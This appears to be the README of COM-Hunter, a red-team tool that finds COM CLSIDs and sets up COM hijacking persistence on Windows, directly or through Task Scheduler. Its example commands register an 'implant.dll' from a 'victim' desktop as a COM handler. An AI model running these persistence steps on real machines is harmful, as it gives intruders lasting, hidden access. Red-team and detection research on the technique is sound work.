COM-Hunter

COM Hijacking VOODOO

Description

COM-Hunter is a COM Hijacking persistnce tool written in C#.

The following list explains the available modes:

• Search Mode: Searches for CLSIDs based on InprocServer32, LocalServer32, and registry hives HKLM and HKCU.
• Classic Persist Mode: Performs classic COM hijacking persistence using LocalServer32 or InprocServer32.
• Task Scheduler Mode: Automatically establishes COM hijacking persistence via Task Scheduler using LocalServer32 or InprocServer32.

This project created with ❤️ by @nickvourd && @S1ckB0y1337

ℹ️ Inspired by the RTO course from @zeropointsecltd.

Table of Contents

• COM-Hunter
  • Description
  • Table of Contents
  • Usage
  • Examples
  • References

Usage

 ██████╗ ██████╗ ███╗   ███╗      ██╗  ██╗██╗   ██╗███╗   ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║      ██║  ██║██║   ██║████╗  ██║╚══██╔══╝██╔════╝██╔══██╗
██║     ██║   ██║██╔████╔██║█████╗███████║██║   ██║██╔██╗ ██║   ██║   █████╗  ██████╔╝
██║     ██║   ██║██║╚██╔╝██║╚════╝██╔══██║██║   ██║██║╚██╗██║   ██║   ██╔══╝  ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║      ██║  ██║╚██████╔╝██║ ╚████║   ██║   ███████╗██║  ██║
 ╚═════╝ ╚═════╝ ╚═╝     ╚═╝      ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝   ╚═╝   ╚══════╝╚═╝  ╚═╝

                                   Version: 2.0
                             @nickvourd && @S1ckB0y1337
                  ~ Inspired during the RTO course by @zeropointsecltd ~

Usage: COM_Hunter.exe <mode> <options>

[+] Modes:
    search             Search Mode
    persist            Classic Persist Mode
    tasksch            Task Scheduler Mode

[+] Search Mode:
Usage:  COM-Hunter.exe search <CLSID> <options>
    -a, --all                   Search DLL and EXE implementations in HKLM and HKCU
    -i, --inprocserver32        Search DLL implementations in HKLM and HKCU
    -l, --localserver32         Search EXE implementations in HKLM and HKCU
    -m, --machine               Search DLL and EXE implementations in HKLM
    -u, --user                  Search DLL and EXE implementations in HKCU

[+] Classic Persist Mode:
Usage:  COM-Hunter.exe persist <CLSID> <binary_path> <options>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] Task Scheduler Mode:
Usage:  COM-Hunter.exe tasksch <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

Examples

ℹ️ Search DLL and EXE implementations in HKLM and HKCU:

.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a

ℹ️ Search EXE implementations in HKLM and HKCU:

.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l

ℹ️ Perform classic persistence using DLL implementation:

.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i

ℹ️ Perform classic persistence using EXE implementation:

.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.dll --localserver32

ℹ️ Perform persistence via Task Scheduler using DLL implementation:

.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32

References

• Persistence: “the continued or prolonged existence of something”: Part 2 – COM Hijacking by MDSec
• Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques by BOHOPS
• Userland Persistence with Scheduled Tasks and COM Handler Hijacking by Enigma0x3
• COM Objects Hijacking by Virus Total